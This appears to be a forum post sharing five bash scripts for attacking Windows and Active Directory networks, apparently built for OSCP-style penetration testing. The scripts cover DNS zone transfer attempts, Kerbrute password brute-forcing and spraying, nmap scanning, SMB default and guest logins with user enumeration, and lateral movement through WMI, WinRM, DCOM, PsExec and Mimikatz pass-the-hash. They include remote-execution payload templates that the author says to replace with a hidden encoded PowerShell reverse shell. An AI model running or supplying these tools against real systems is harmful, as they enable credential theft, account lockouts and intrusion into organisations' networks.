stihl не предоставил(а) никакой дополнительной информации.
dns_enum.sh
krb_enum.sh
port_scan.sh
smb_enum.sh
ad_LateralMove.sh
Код:
#!/bin/bash
line="\n============================================================\n"
echo -e "[!] Tip: This queries a DNS Server, but it isn't a replacement for other DNS Enumeration techniques (e.g. fuzzing subdomains with ffuf)\n"
echo -e "\nEnter the target's hostname:"
read hostname
echo -e "\nEnter the DNS Server's IP Address:"
read server
echo -e "$line\n[Basic DNS Queries]\n$line\nLookup any records:\n"
dig any $hostname @$server
echo -e "$line\nLookup additional DNS Server info:\n"
dig all $hostname @$server
echo -e "$line\n[AXFR]\n$line\n[!] Tip: If the output shows 'Transfer failed' it means that this type of query isn't supported by the DNS Server\n\nAttempting Zone Transfer:\n"
dig axfr $hostname @$server
echo -e "$line"krb_enum.sh
Код:
#!/bin/bash
line="\n============================================================\n"
echo -e "$line\nSelect the operation to perform:\n[1] bruteuser - Bruteforce a single user's password from a wordlist"
echo -e "[2] credpairs - Read username:password combos from a file\n[3] passwordspray - Test a single password against a list of users"
echo -e "[4] userenum - Enumerate valid domain usernames via Kerberos\n[5] bruteforce - Bruteforce usenames & passwords (VERIFY IT WORKS!)"
echo -e "\n\n[!] Tip: Kerbrute can lockout accounts if that setting is enabled\n"
read mode
echo -e "\nSpecify the domain (e.g. xample.local):\n"
read dom
echo -e "\nSpecify the Domain Controller's IP Address:\n"
read dc
if [ $mode == 1 ]
then
echo -e "\nEnter the file path for the password wordlist:\n"
read passwd
echo -e "\nEnter the username to Bruteforce\n"
read user
set -x
kerbrute bruteuser -d $dom --dc $dc "$passwd" "$user"
set +x
elif [ $mode == 2 ]
then
echo -e "\nEnter the file path for the credential wordlist (The format is username:password):\n"
read passwd
set -x
kerbrute bruteforce -d $dom --dc $dc "$passwd"
set +x
elif [ $mode == 3 ]
then
echo -e "\nSpecify the password to spray:\n"
read passwd
echo -e "\nSpecify the file path to the username wordlist:\n"
read user
set -x
kerbrute passwordspray -d $dom --dc $dc "$user" "$passwd"
set +x
elif [ $mode == 4 ]
then
echo -e "\nSpecify the file path to the username wordlist:\n"
read user
echo -e "$line\n[!] Tip: kerbrute performs ASREP Roasting on vuln accounts, but the hash *isn't* in a crackable format for john. ASREP Roast with Ares instead.\n$line"
set -x
kerbrute userenum -d $dom --dc $dc "$user"
set +x
elif [ $mode == 5 ]
then
echo -e "\nSpecify the file path to the username wordlist:\n"
read user_list
echo -e "\nEnter the file path for the password wordlist:\n"
read passwd
for u in $(cat $user_list)
do
set -x
kerbrute bruteuser -d $dom --dc $dc "$passwd" "$u"
set +x
echo -e "$line"
done
else
echo -e "\nYou did not select a valid option\n"
fi
echo -e "$line"port_scan.sh
Код:
#!/bin/bash
line="\n============================================================\n"
echo -e "\nEnter target IP / hostname:\n"
read target
echo -e "\nSave Scan Output to file?\n[1] Yes\n[2] No\n"
read opt
while true;
do
echo -e "\nHow fast should the scan be? Enter a timing value (1-5):\n\n[!] Tip: 3 is the default speed. Anything faster may be less reliable.\n"
read timing
if [[ "$timing" == "1" || "$timing" == "2" || "$timing" == "3" || "$timing" == "4" || "$timing" == "5" ]]
then
break # Valid input; exit loop
else
echo "Invalid input. Please enter a number from 1 to 5."
fi
done
if [ "$opt" == "1" ]
then
tcp_out="| tee ${target}_TCP.nmap"
udp_out="| tee ${target}_Top_UDP.nmap"
else
tcp_out=""
udp_out=""
fi
echo -e "\nSpecify Scan Type for TCP Ports:\n[1] TCP-Connect\n[2] SYN-Stealth\n\n[!] Tip: Depending on config, one type of scan may be more accurate.\n"
read scan
echo -e $line
if [ $scan == 1 ]
then
echo -e "\nTCP-Connect Scan: All ports & default scripts used\n"
sudo nmap -sT -p- -T"$timing" -sVC -O -Pn -vv $target $tcp_out
elif [ $scan == 2 ]
then
echo -e "\nTCP SYN Scan: All ports & default scripts used\n\n[!] Tip: Consider TCP Connect Scan for OSCP\n"
echo -e "[!] Tip: Even if Nmap's output says 'Not shown: 1000 open|filtered udp ports (no-response)', there could be UDP Ports in use (i.e. SNMP on 161)\n"
sudo nmap -p- -T"$timing" -sVC -Pn -vv $target $tcp_out
else
echo -e "\nYou did not select a valid option\n"
return
fi
echo -e $line
echo -e "\nUDP Scan: Top 1000 ports\n"
sudo nmap -sUV -T"$timing" -Pn -v $target $udp_out
echo -e $linesmb_enum.sh
Код:
#!/bin/bash
line="\n============================================================\n"
echo -e "\nEnter the target IP / hostname:"
read target
echo -e "\nSelect an operation:\n[1] Test default logins\n[2] Enumerate users via Read access to IPC$\n[3] List contents & permissions for all shares"
echo -e "[4] Enumerate Server Info (e.g. Get Account Descriptions)\n"
read mode
if [ $mode == 1 ] || [ $mode == 2 ]
then
query=$(nxc smb $target -u '' -p '')
domain=$(echo "$query" | grep domain | awk -F 'domain:' '{print $2}' | awk -F ')' '{print $1}')
host=$(echo "$query" | awk -F 'name:' '{print $2}' | awk -F ')' '{print $1}')
dom="\n[+] Using Domain: $domain\n"
hostname="\n[+] Using Hostname: $host\n"
ad=0
if [ "$host" == "$domain" ]
then
echo -e "\nThe Hostname is identical to the Domain Name\n"
elif [ "$domain" == "" ]
then
echo -e "\nNo Domain Name detected\n"
else
ad=1
fi
fi
echo -e "$line"
if [ $mode == 1 ]
then
echo -e "$hostname"
echo -e "Null Login. No creds\n"
nxc smb "$target" -u '' -p '' -d "$host" --shares
echo -e "$line"
echo -e "Anonymous username & no password\n"
nxc smb "$target" -u 'Anonymous' -p '' -d "$host" --shares
echo -e "$line"
echo -e "Anonymous:Anonymous\n"
nxc smb "$target" -u 'Anonymous' -p 'Anonymous' -d "$host" --shares
echo -e "$line"
echo -e "Guest login\n"
nxc smb "$target" -u 'guest' -p '' -d "$host" --shares
echo -e "$line"
if [ $ad -eq 1 ]
then
echo -e "$dom"
echo -e "Null Login. No creds\n"
nxc smb "$target" -u '' -p '' -d "$domain" --shares
echo -e "$line"
echo -e "Anonymous username & no password\n"
nxc smb "$target" -u 'Anonymous' -p '' -d "$domain" --shares
echo -e "$line"
echo -e "Anonymous:Anonymous\n"
nxc smb "$target" -u 'Anonymous' -p 'Anonymous' -d "$domain" --shares
echo -e "$line"
echo -e "Guest login\n"
nxc smb "$target" -u 'guest' -p '' -d "$domain" --shares
echo -e "$line"
fi
elif [ $mode == 2 ]
then
echo -e "\nDo you want to extract usernames & save them to a file?\n[1] No. Print results to STDOUT\n[2] Yes. Print results & then write usernames to a file\n"
read opt
if [ "$opt" == "1" ] || [ "$opt" == "2" ]
then
echo -e "\nEnter the Username to use (Use Syntax DOMAIN/USER or HOSTNAME/USER):\n"
read user
echo -e "\nSelect an option:\n[1] Authenticate using a password\n[2] Authenticate using an NTLM hash\n[3] Use an account that doesn't have a password\n"
read cred
if [ $cred == 1 ]
then
echo -e "\nEnter the Password:\n"
read pass
elif [ $cred == 2 ]
then
echo -e "\nEnter the NTLM hash:\n"
read ntlm
elif [ $cred == 3 ]
then
echo -e "\nConnecting using an account with a Null password\n"
else
echo -e "\nYou did not select a valid option\n"
return
fi
fi
if [ "$opt" == "1" ] || [ "$opt" == "2" ]
then
if [ $cred == 1 ]
then
echo -e "\n[Local SIDs]\n"
lUsers=$(lookupsid.py "$user":"$pass"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
echo -e "$line"
if [ $ad -eq 1 ]
then
echo -e "\n[Domain SIDs]\n"
dUsers=$(lookupsid.py -domain-sids "$user":"$pass"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
fi
elif [ $cred == 2 ]
then
echo -e "\n[Local SIDs]\n"
lUsers=$(lookupsid.py -hashes :$ntlm "$user"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
echo -e "$line"
if [ $ad -eq 1 ]
then
echo -e "\n[Domain SIDs]\n"
dUsers=$(lookupsid.py -domain-sids -hashes :$ntlm "$user"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
fi
elif [ $cred == 3 ]
then
echo -e "\n[Local SIDs]\n"
lUsers=$(lookupsid.py -no-pass "$user"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
echo -e "$line"
if [ $ad -eq 1 ]
then
echo -e "\n[Domain SIDs]\n"
dUsers=$(lookupsid.py -no-pass -domain-sids "$user"@"$target" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}')
fi
fi
if [ "$opt" == "2" ]
then
echo -e "\nLocal Users: Path to output file\n"
read out1
echo -e "\nDomain Users: Path to output file (can be the same file path)\n"
read out2
if [ "$out1" == "$out2" ]
then
for l in $lUsers
do
echo $l >> /dev/shm/smb_user_enum.txt
done
for d in $dUsers
do
echo $d >> /dev/shm/smb_user_enum.txt
done
duplicut /dev/shm/smb_user_enum.txt -o $out1
else
for l in $lUsers
do
echo $l >> $out1
done
for d in $dUsers
do
echo $d >> $out2
done
fi
fi
else
echo -e "\nYou did not select a valid option\n"
fi
elif [ $mode == 3 ]
then
echo -e "\nEnter the Domain name or Hostname to use:\n"
read dom
echo -e "\nEnter the Username to use:\n"
read user
echo -e "\n\n[!] Tip: You can authenticate with a password, or with LMHASH:NTHASH (to use hashes, you must specify both seperated with a colon as shown)\n"
echo -e "\nEnter the password or the hashes:\n"
read cred
set -x
smbmap -H $target -u "$user" -p "$cred" -d $dom -r
set +x
elif [ $mode == 4 ]
then
# May want to specify domain with -w ?
# echo -e "\nEnter the Domain name or Hostname to use:\n"
# read dom
echo -e "\n[!] Tip: If Null Sessions are supported, just enter a blank username & password\n\nEnter the Username to use:\n"
read user
echo -e "\nHow do you want to authenticate?\n[1] Password\n[2] NTLM Hash\n"
read cred
if [ $cred == 1 ]
then
echo -e "Enter the Password:\n"
read pass
enum4linux-ng -u "$user" -p "$pass" -R -d -A "$target"
elif [ $cred == 2 ]
then
echo -e "\nEnter the NTLM hash:\n"
read ntlm
enum4linux-ng -u "$user" -H "$ntlm" -R -d -A "$target"
else
echo -e "\nYou did not select a valid option\n"
return
fi
else
echo -e "\nYou did not select a valid option\n"
fiad_LateralMove.sh
Код:
#!/bin/bash
line="\n============================================================\n"
Creds()
{
echo -e "\nEnter the target account's username without the Hostname (e.g. bob):\n"
read user
echo -e "\nEnter the target account's password:\n"
read passwd
}
echo -e "$line\n[!] Tip: When pivoting between hosts in the same subnet, you can often use the target's IP Address & their Hostname interchangeably.\n"
echo -e "HOWEVER, this isn't always the case (i.e. When using Sysinternals PSExec without passing credentials). If you're having trouble connecting with one of these, try using the other."
echo -e "$line\nSelect a technique:\n[1] WMI\n[2] WinRM (WinRS & PS Remoting)\n[3] DCOM\n[4] PSExec (Sysinternals)\n"
read mode
if [ $mode == 1 ]
then
echo -e "\nSpecify the target's IP Address\n"
read target
Creds
echo -e "$line\n[!] Tip: There are 2 methods for RCE using WMI: WMIC & Powershell. WMIC is deprecated, but it may still be enabled for backwards compatibility\n"
echo -e "[!] Tip: These test payloads just launch the Calculator App. If they work, it'll output the PID & ReturnValue 0.\n"
echo -e "[+] After the test, substitute the calc command for a Reverse shell payload (e.g. \$Command = 'powershell -nop -w hidden -e...)\n$line\nWMIC Test Payload:\n"
echo "wmic /node:$target /user:$user /password:$passwd process call create \"calc\""
echo -e "$line\nPowershell Test Payload:\n"
echo "\$username = '$user';"
echo "\$password = '$passwd';"
echo "\$secureString = ConvertTo-SecureString \$password -AsPlaintext -Force;"
echo "\$credential = New-Object System.Management.Automation.PSCredential \$username, \$secureString;"
echo "\$Options = New-CimSessionOption -Protocol DCOM"
echo "\$Session = New-Cimsession -ComputerName $target -Credential \$credential -SessionOption \$Options"
echo "\$Command = 'calc';"
echo "Invoke-CimMethod -CimSession \$Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =\$Command};"
elif [ $mode == 2 ]
then
echo -e "$line\nSpecify the target's Hostname for WinRS or its IP Address for PS Remoting:\n"
read target
Creds
echo -e "\nWinRS Test Payload:\n[!] Tip: If this test works, substitute the commands for a Reverse shell payload\n\n"
echo "winrs -r:$target -u:$user -p:$passwd \"cmd /c hostname & whoami\""
echo -e "$line\nBasic PS Remoting:\n[!] Tip: Based off of output from New-PSSession, you may need to use a differnt ID number for Enter-PSSession\n\n"
echo "\$username = '$user';"
echo "\$password = '$passwd';"
echo "\$secureString = ConvertTo-SecureString \$password -AsPlaintext -Force;"
echo "\$credential = New-Object System.Management.Automation.PSCredential \$username, \$secureString;"
echo "New-PSSession -ComputerName $target -Credential \$credential"
echo "Enter-PSSession 1"
#Is there a way to check for Special Configuration Names for PS Remoting before getting RCE, so you can use that to connect?
elif [ $mode == 3 ]
then
echo -e "\nEnter the target's IP Address:\n"
read target
echo -e "$line\n[!] Tip: This DCOM method requires that your CURRENT user is a Local Admin on the current machine & the target machine\n"
echo -e "\n[!] Tip: You must run the following commands inside an Admin Powershell terminal (i.e. R Click & Run as Admin)\n"
echo "\$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application.1\",\"$target\"))"
echo "\$dcom.Document.ActiveView.ExecuteShellCommand(\"powershell\",\$null,\"powershell -nop -w hidden -e ENCODED_PAYLOAD\",\"7\")"
elif [ $mode == 4 ]
then
#Add option to output cmds for Mimikatz & Rubeus for PtH & PtT
echo -e "\n[!] Tip: PSExec can be uploaded to the target & doesn't need to be installed.\n"
echo -e "[!] Tip: If you don't supply credentials, you'll authenticate as the current user. Ergo, you can OPtH or PtT (Kerberos) by combining it with a tool like Mimikatz."
echo -e "\nSelect an option:\n[1] Use a Password\n[2] Use an NTLM Hash (OPtH Attack)\n"
read opt
if [ "$opt" == 1 ]
then
echo -e "\nEnter the target's IP Address:\n"
read target
echo -e "\nEnter the Domain (e.g.for xample.com, use xample):\n"
read dom
Creds
echo -e "$line\nInteractive Session as User:\n"
echo ".\\PsExec.exe -accepteula -i \\\\$target -u $dom\\$user -p $passwd powershell"
echo -e "\nInteractive Session as SYSTEM:\n"
echo ".\\PsExec.exe -accepteula -s \\\\$target -u $dom\\$user -p $passwd powershell"
elif [ "$opt" == 2 ]
then
echo -e "\nEnter the target's Hostname for an OPtH Attack (NOT the IP Address):\n"
read target
echo -e "$line\n[Setup]\n\n1) Launch an Admin Powershell terminal & start Mimikatz\n2) privilege::debug\n"
echo -e "\nEnter the target account's username:\n"
read user
echo -e "\nEnter the Domain name (e.g. xample.com):\n"
read dom
echo -e "\nEnter the target account's NTLM Hash:\n"
read ntlm
echo -e "$line\n[PtH]\n\nsekurlsa::pth /user:$user /domain:$dom /ntlm:$ntlm /run:powershell\n"
echo -e "$line\n[OPtH]\nRequest a TGT using the new Powershell session (e.g. authenticate to an SMB Share)\n"
echo "net use \\\\$target"
echo "klist"
echo -e "$line\nInteractive Session as User:\n"
echo ".\\PsExec.exe -accepteula \\\\$target powershell"
echo -e "\nInteractive Session as SYSTEM:\n"
echo ".\\PsExec.exe -accepteula -s \\\\$target powershell"
else
echo -e "\nYou did not select a valid option\n"
exit
fi
else
echo -e "\nYou did not select a valid option\n"
exit
fi
echo -e "$line"